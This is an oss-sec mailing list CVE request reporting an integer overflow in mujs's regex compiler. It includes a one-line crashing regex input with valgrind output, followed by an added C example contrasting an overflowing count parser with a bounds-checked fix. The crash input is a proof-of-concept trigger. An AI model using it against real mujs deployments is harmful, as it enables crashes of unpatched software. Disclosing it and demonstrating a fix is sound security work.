oss-sec mailing list archives
CVE request - integer overflow and crash parsing regex in mujs
From: Gustavo Grieco <gustavo.grieco () gmail com>
Date: Sun, 30 Oct 2016 14:29:17 -0300
Hi,

It seems there is an integer overflow somewhere affecting function js_regcomp (line 843 in regexp.c) in mujs.

To reproduce (tested in revision 5c337af4b3df80cf967e4f9f6a21522de84b392a):

$ echo '(/.{135303839468541,43}/);' | valgrind --quiet ./build/mujs
==29376== Argument 'size' of function malloc has a fishy (possibly negative) value: -5152
==29376==    at 0x4C2AB8D: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==29376==    by 0x415FCC: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
==29376==
==29376== Invalid write of size 2
==29376==    at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
==29376==  Address 0x2 is not stack'd, malloc'd or (recently) free'd
==29376==
==29376==
==29376== Process terminating with default action of signal 11 (SIGSEGV)
==29376==  Access not within mapped region at address 0x2
==29376==    at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)

This test case was found using QuickFuzz. Please assign a CVE if suitable.
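The failure mode behind this report, as an added example that is not part of the original post and is not mujs's own code: a decimal repeat count for a {n,m} quantifier accumulated in 32-bit arithmetic with no bound check wraps to a negative value on the count from the test case, and any allocation size derived from it goes negative too. The checked parser beside it caps the count before the multiply can overflow and rejects the pattern instead. The REP_MAX cap, the function names and the quantifier grammar are assumptions for illustration, not mujs constants or APIs.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical cap on a repetition count, of the kind a regex compiler can
   enforce so that the program size it derives from {n,m} stays small. */
#define REP_MAX 255

/* Naive parser: accumulates digits in 32-bit arithmetic with no bound check.
   The wraparound is performed in uint32_t (well defined) and the bits are
   reinterpreted as int32_t via memcpy, which reproduces what a signed int
   accumulator yields on two's-complement targets without undefined behaviour.
   Advances *s past the digit run and returns the (possibly negative) count. */
int32_t naive_parse_count(const char **s)
{
    uint32_t n = 0;
    int32_t r;
    while (isdigit((unsigned char)**s)) {
        n = n * 10u + (uint32_t)(**s - '0');
        (*s)++;
    }
    memcpy(&r, &n, sizeof r);
    return r;
}

/* Checked parser: returns a count in [0, REP_MAX], or -1 if there are no
   digits or the count would exceed REP_MAX. The bound is tested before
   n * 10 + d is computed, so the arithmetic itself can never overflow.
   On success *s is advanced past the digits; on error it is left alone. */
int checked_parse_count(const char **s)
{
    const char *p = *s;
    int n = 0;
    if (!isdigit((unsigned char)*p))
        return -1;
    while (isdigit((unsigned char)*p)) {
        int d = *p - '0';
        if (n > (REP_MAX - d) / 10)   /* n*10 + d would exceed REP_MAX */
            return -1;
        n = n * 10 + d;
        p++;
    }
    *s = p;
    return n;
}

/* Parse a "{n}", "{n,}" or "{n,m}" quantifier starting at the '{'.
   Returns 1 and fills *min/*max on success (max == -1 means unbounded),
   0 on a syntax error, an out-of-range count, or max < min. */
int parse_brace_quantifier(const char *s, int *min, int *max)
{
    if (*s != '{')
        return 0;
    s++;
    *min = checked_parse_count(&s);
    if (*min < 0)
        return 0;
    if (*s == '}') {            /* {n} */
        *max = *min;
        return 1;
    }
    if (*s != ',')
        return 0;
    s++;
    if (*s == '}') {            /* {n,} */
        *max = -1;
        return 1;
    }
    *max = checked_parse_count(&s);
    if (*max < 0 || *s != '}' || *max < *min)
        return 0;
    return 1;
}

int main(void)
{
    /* constructed input: the repeat count from the crashing test case */
    const char *count = "135303839468541";
    const char *p = count;
    int mn, mx;

    printf("naive count   : %d\n", (int)naive_parse_count(&p));
    p = count;
    printf("checked count : %d\n", checked_parse_count(&p));
    printf("{135303839468541,43} accepted: %d\n",
           parse_brace_quantifier("{135303839468541,43}", &mn, &mx));
    printf("{2,5} accepted: %d (min=%d max=%d)\n",
           parse_brace_quantifier("{2,5}", &mn, &mx), mn, mx);
    return 0;
}
```

The check `n > (REP_MAX - d) / 10` is the whole fix: with the bound applied before the multiplication, the count can never leave the range a later `count * sizeof(instruction)` allocation is sized for, so the "fishy (possibly negative)" malloc argument in the report cannot arise from this path.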
Current thread:
- CVE request - integer overflow and crash parsing regex in mujs Gustavo Grieco (Oct 30)
- Re: CVE request - integer overflow and crash parsing regex in mujs cve-assign (Oct 30)